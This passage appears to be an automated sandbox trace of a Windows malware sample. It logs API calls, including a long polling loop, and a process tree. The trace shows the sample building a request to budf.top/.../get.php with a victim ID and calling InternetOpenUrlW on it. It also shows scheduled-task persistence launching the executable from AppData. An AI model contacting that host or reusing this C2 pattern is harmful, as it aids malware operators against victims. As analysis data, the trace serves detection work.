wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0097.498] Sleep (dwMilliseconds=0x64) [0097.607] timeGetTime () returned 0x114d75c [0097.607] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0097.607] Sleep (dwMilliseconds=0x64) [0097.717] timeGetTime () returned 0x114d7c9 [0097.717] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0097.717] Sleep (dwMilliseconds=0x64) [0097.826] timeGetTime () returned 0x114d836 [0097.826] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0097.826] Sleep (dwMilliseconds=0x64) [0097.935] timeGetTime () returned 0x114d8a3 [0097.935] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0097.935] Sleep (dwMilliseconds=0x64) [0098.044] timeGetTime () returned 0x114d911 [0098.044] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0098.044] Sleep (dwMilliseconds=0x64) [0098.153] timeGetTime () returned 0x114d97e [0098.153] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0098.153] Sleep (dwMilliseconds=0x64) [0098.262] timeGetTime () returned 0x114d9eb [0098.262] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0098.262] Sleep (dwMilliseconds=0x64) [0098.371] timeGetTime () returned 0x114da58 [0098.371] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0098.371] Sleep (dwMilliseconds=0x64) [0098.481] timeGetTime () returned 0x114dac5 [0098.481] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0098.481] Sleep (dwMilliseconds=0x64) [0098.590] timeGetTime () returned 0x114db33 [0098.590] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0098.590] Sleep (dwMilliseconds=0x64) [0098.699] timeGetTime () returned 0x114dba0 [0098.699] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0098.699] Sleep (dwMilliseconds=0x64) [0098.808] timeGetTime () returned 0x114dc0d [0098.808] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0098.808] Sleep (dwMilliseconds=0x64) [0098.917] timeGetTime () returned 0x114dc7a [0098.917] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0098.918] Sleep (dwMilliseconds=0x64) [0099.027] timeGetTime () returned 0x114dce7 [0099.027] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0099.027] Sleep (dwMilliseconds=0x64) [0099.147] timeGetTime () returned 0x114dd55 [0099.147] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0099.147] Sleep (dwMilliseconds=0x64) [0099.245] timeGetTime () returned 0x114ddc2 [0099.245] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0099.245] Sleep (dwMilliseconds=0x64) [0099.355] timeGetTime () returned 0x114de2f [0099.355] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0099.355] Sleep (dwMilliseconds=0x64) [0099.464] timeGetTime () returned 0x114de9c [0099.464] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0099.464] Sleep (dwMilliseconds=0x64) [0099.573] timeGetTime () returned 0x114df09 [0099.573] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0099.573] Sleep (dwMilliseconds=0x64) [0099.682] timeGetTime () returned 0x114df77 [0099.682] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0099.682] Sleep (dwMilliseconds=0x64) [0099.791] timeGetTime () returned 0x114dfe4 [0099.792] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0099.792] Sleep (dwMilliseconds=0x64) [0099.901] timeGetTime () returned 0x114e051 [0099.901] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0099.901] Sleep (dwMilliseconds=0x64) [0100.010] timeGetTime () returned 0x114e0be [0100.010] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0100.010] Sleep (dwMilliseconds=0x64) [0100.119] timeGetTime () returned 0x114e12b [0100.119] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0100.120] Sleep (dwMilliseconds=0x64) [0100.228] timeGetTime () returned 0x114e199 [0100.228] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0100.228] Sleep (dwMilliseconds=0x64) [0100.337] timeGetTime () returned 0x114e206 [0100.337] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0100.337] Sleep (dwMilliseconds=0x64) [0100.446] timeGetTime () returned 0x114e273 [0100.446] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0100.446] Sleep (dwMilliseconds=0x64) [0100.555] timeGetTime () returned 0x114e2e0 [0100.555] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0100.555] Sleep (dwMilliseconds=0x64) [0100.665] timeGetTime () returned 0x114e34d [0100.665] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0100.665] Sleep (dwMilliseconds=0x64) [0100.775] timeGetTime () returned 0x114e3bb [0100.775] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0100.775] Sleep (dwMilliseconds=0x64) [0100.884] timeGetTime () returned 0x114e428 [0100.884] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0100.884] Sleep (dwMilliseconds=0x64) [0100.993] timeGetTime () returned 0x114e495 [0100.993] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0100.993] Sleep (dwMilliseconds=0x64) [0101.103] timeGetTime () returned 0x114e502 [0101.103] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0101.103] Sleep (dwMilliseconds=0x64) [0101.211] timeGetTime () returned 0x114e56f [0101.211] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0101.211] Sleep (dwMilliseconds=0x64) [0101.320] timeGetTime () returned 0x114e5dd [0101.320] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0101.320] Sleep (dwMilliseconds=0x64) [0101.435] timeGetTime () returned 0x114e64a [0101.435] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0101.435] Sleep (dwMilliseconds=0x64) [0101.539] timeGetTime () returned 0x114e6b7 [0101.539] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0101.539] Sleep (dwMilliseconds=0x64) [0101.802] timeGetTime () returned 0x114e724 [0101.802] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0101.802] Sleep (dwMilliseconds=0x64) [0101.897] timeGetTime () returned 0x114e791 [0101.897] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0101.897] Sleep (dwMilliseconds=0x64) [0102.007] timeGetTime () returned 0x114e7ff [0102.007] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0102.007] Sleep (dwMilliseconds=0x64) [0102.116] timeGetTime () returned 0x114e86c [0102.116] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0102.116] Sleep (dwMilliseconds=0x64) [0102.225] timeGetTime () returned 0x114e8d9 [0102.231] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfbda4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0102.231] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0102.249] AreFileApisANSI () returned 1 [0102.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfbda4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0102.249] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x7a) returned 0x29fa70 [0102.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfbda4e4, cbMultiByte=-1, lpWideCharStr=0x29fa70, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0102.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfbda368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.307] GetLastError () returned 0x2 [0102.315] GetLastError () returned 0x2 [0102.315] SetLastError (dwErrCode=0x2) [0102.315] GetLastError () returned 0x2 [0102.315] SetLastError (dwErrCode=0x2) [0102.316] GetLastError () returned 0x2 [0102.316] SetLastError (dwErrCode=0x2) [0102.324] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x29fa70 | out: hHeap=0x240000) returned 1 [0102.324] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0102.324] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x60) returned 0x31cf38 [0102.324] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x8e) returned 0x3027a8 [0102.324] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31cf38 | out: hHeap=0x240000) returned 1 [0102.324] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318ec00 [0102.324] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x840) returned 0x2a9fd0 [0102.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318ec00, cbMultiByte=-1, lpWideCharStr=0x2a9fd0, cchWideChar=1056 | out: lpWideCharStr="B56D42C81778FD36CA7BD76E3CC6490E") returned 33 [0102.324] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x850) returned 0x31a1430 [0102.324] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2a9fd0 | out: hHeap=0x240000) returned 1 [0102.324] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x318ec00 | out: hHeap=0x240000) returned 1 [0102.324] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x8b0) returned 0x319dee8 [0102.324] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3027a8 | out: hHeap=0x240000) returned 1 [0102.324] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a1430 | out: hHeap=0x240000) returned 1 [0102.324] lstrcpyW (in: lpString1=0xfbdaf78, lpString2="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" [0102.324] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E", lpString2="&first=true" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E&first=true") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E&first=true" [0102.324] InternetOpenUrlW (hInternet=0xcc001c, lpszUrl="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) Process: id = "7" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x509f5000" os_pid = "0xae4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x370" cmd_line = "taskeng.exe {749864B8-2F99-4F86-B790-B86B4C462030} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 101 os_tid = 0x7fc Thread: id = 102 os_tid = 0xbb8 Thread: id = 103 os_tid = 0xbcc Thread: id = 104 os_tid = 0xa4c Thread: id = 105 os_tid = 0xab0 Thread: id = 106 os_tid = 0x344 Thread: id = 107 os_tid = 0xb6c Process: id = "8" image_name = "cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" page_root = "0x4709b000" os_pid = "0xbbc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xae4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Task" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 108 os_tid = 0xb54 [0101.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x3dd7dfe0, dwHighDateTime=0x1d60a66)) [0101.880] GetCurrentProcessId () returned 0xbbc [0101.881] GetCurrentThreadId () returned 0xb54 [0101.881] GetTickCount () returned 0x114e772 [0101.881] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=22222017256) returned 1 [0101.926] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0101.926] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x30000 [0101.926] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.927] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0101.927] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0101.927] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0101.927] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0101.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.927] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0101.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.927] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0101.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.927] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0101.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.927] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0101.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.928] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0101.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.928] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0101.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.928] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0101.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.928] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0101.929] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x8, Size=0x214) returned 0x307d0 [0101.929] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.929] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0101.929] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0101.929] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0101.929] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0101.930] GetCurrentThreadId () returned 0xb54 [0101.930] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0101.930] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x8, Size=0x800) returned 0x309f0 [0101.930] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0101.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0101.930] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0101.930] SetHandleCount (uNumber=0x20) returned 0x20 [0101.930] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Task" [0101.930] GetEnvironmentStringsW () returned 0x6c04b0* [0101.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0101.930] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x0, Size=0x565) returned 0x311f8 [0101.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x311f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0101.930] FreeEnvironmentStringsW (penv=0x6c04b0) returned 1 [0101.930] GetLastError () returned 0x0 [0101.930] SetLastError (dwErrCode=0x0) [0101.930] GetLastError () returned 0x0 [0101.930] SetLastError (dwErrCode=0x0) [0101.930] GetLastError () returned 0x0 [0101.931] SetLastError (dwErrCode=0x0) [0101.931] GetACP () returned 0x4e4 [0101.931] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x0, Size=0x220) returned 0x31768 [0101.931] GetLastError () returned 0x0 [0101.931] SetLastError (dwErrCode=0x0) [0101.931] IsValidCodePage (CodePage=0x4e4) returned 1 [0101.931] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0101.931] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0101.931] GetLastError () returned 0x0 [0101.931] SetLastError (dwErrCode=0x0) [0101.931] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0101.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0101.931] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0101.931] GetLastError () returned 0x0 [0101.931] SetLastError (dwErrCode=0x0) [0101.931] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0101.931] 